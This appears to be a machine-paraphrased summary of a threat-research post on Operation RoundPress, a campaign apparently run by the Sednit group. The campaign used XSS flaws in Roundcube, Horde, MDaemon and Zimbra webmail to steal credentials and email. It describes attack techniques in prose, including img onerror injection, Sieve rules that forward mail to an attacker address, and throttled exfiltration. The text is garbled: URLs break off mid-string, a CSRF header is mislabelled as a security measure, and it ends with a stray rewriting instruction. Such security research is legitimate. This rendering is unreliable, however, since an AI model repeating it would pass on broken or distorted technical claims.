This blog post presents Operation RoundPress, a campaign targeting high-value webmail servers with XSS vulnerabilities, believed to be carried out by the Sednit cyberespionage group with medium confidence. The main objective of this operation is to steal sensitive data from specific email accounts.
Key points highlighted in this post include:
– Operation RoundPress utilizes spearphishing emails to exploit XSS vulnerabilities and inject malicious JavaScript code into the victim’s webmail page.
– Initially targeting Roundcube in 2023, the operation expanded in 2024 to include other webmail software such as Horde, MDaemon, and Zimbra.
– Sednit employed a zero-day XSS vulnerability for MDaemon, which was reported and subsequently patched in version 24.5.1.
– The majority of victims are governmental entities and defense companies in Eastern Europe, with additional targets in Africa, Europe, and South America.
– Detailed analysis is provided on various JavaScript payloads used in the operation, capable of stealing webmail credentials and exfiltrating contacts and email messages.
– One of the payloads, SpyPress.MDAEMON, can bypass two-factor authentication.
The blog also delves into the profile of the Sednit group, their history of cyber operations, and the linkages to past incidents such as the DNC hack and the WADA email leak.
Furthermore, the post outlines the compromise chain of Operation RoundPress, detailing how Sednit exploits XSS vulnerabilities in webmail software to execute malicious JavaScript code. Examples of phishing emails used by the group to lure targets into opening the malicious code are provided, along with an overview of the compromise chain.
Lastly, the post mentions the use of an old vulnerability by Sednit for targets using Horde webmail, although the specific exploit remains unidentified. The technique of placing malicious JavaScript code in the onerror attribute of an img element is a common method used in XSS attacks. In the case of Horde Webmail, an attempt was made to exploit this vulnerability, but the XSS filter in version 1.0 prevented the exploit from working properly.
In the case of MDaemon Email Server, a zero-day XSS vulnerability was exploited by Sednit in an email sent to Ukrainian defense companies. The vulnerability was reported to the developers and patched in version 24.5.1, with the CVE-2024-11182 assigned to it.
Similarly, Sednit targeted Roundcube webmail with the CVE-2023-43770 vulnerability, which was patched in a GitHub commit. The exploit allowed for the execution of JavaScript code within the email when rendered in Roundcube.
For Zimbra, Sednit used the CVE-2024-27443 vulnerability, which was patched in a GitHub commit. The exploit involved executing JavaScript code contained in the X-Zimbra-Calendar-Intended-For header of a calendar invitation email.
The JavaScript payloads used by Sednit do not have true persistence but are reloaded each time the victim opens the malicious email. They have the ability to steal webmail credentials and exfiltrate data to a hardcoded C&C server via HTTP POST requests.
Sednit used four payloads in Operation RoundPress in 2024, targeting webmail instances with XSS vulnerabilities. The payloads are obfuscated, with encrypted strings for webmail and C&C server URLs. They communicate with C&C servers via HTTP POST requests and do not have persistence or update mechanisms. SpyPress.HORDE, for example, steals credentials by creating hidden input elements and exfiltrating data via HTTPS POST requests. Finally, it gets the content of each email by fetching https://
Malicious Sieve rules
SpyPress.ROUNDCUBE adds malicious Sieve rules to the victim’s account, as shown in Figure 19. These rules automatically forward incoming emails to an external email address chosen by the attackers. This enables attackers to maintain access to the victim’s emails even after they change their password.
Figure 19. SpyPress.ROUNDCUBE adds malicious Sieve rules
Network protocol
SpyPress.ROUNDCUBE uses the same network protocol as SpyPress.HORDE and SpyPress.MDAEMON. Attention: SpyPress.ROUNDCUBE has been identified to add the HTTP header X-Roundcube-Request, which includes the CSRF token for security purposes. Additionally, it is important to note that a hardcoded lower time limit of 6:02:03 am, October 1st, 2024, has been set in the script we reviewed. Only emails more recent than this timestamp are extracted.
The email source of each message is obtained from https://
In case SpyPress.ROUNDCUBE has extracted over 150 emails consecutively, it pauses the extraction until the next routine execution (two hours later). This is a strategic move to avoid network disturbances and detection.
Moreover, some versions of SpyPress.ROUNDCUBE implement malicious Sieve rules. These rules copy every incoming email to a specified email address controlled by the attacker, like srezoska@skiff[.]com. Skiff was known for its privacy-focused email services and end-to-end encryption.
On the other hand, SpyPress.ZIMBRA, a JavaScript payload injected into vulnerable Zimbra webmail instances, shares similar functionalities with previous payloads. It can steal credentials, extract contacts and settings, and exfiltrate email messages.
For any questions related to our research on WeLiveSecurity, reach out to us at threatintel@eset.com. ESET Research also provides private APT intelligence reports and data feeds, accessible through the ESET Threat Intelligence page.
If you are interested in a detailed list of indicators of compromise (IoCs) and samples, please refer to our GitHub repository.
Thank you for your attention. sentence in a different way:
Please send me the report as soon as possible.
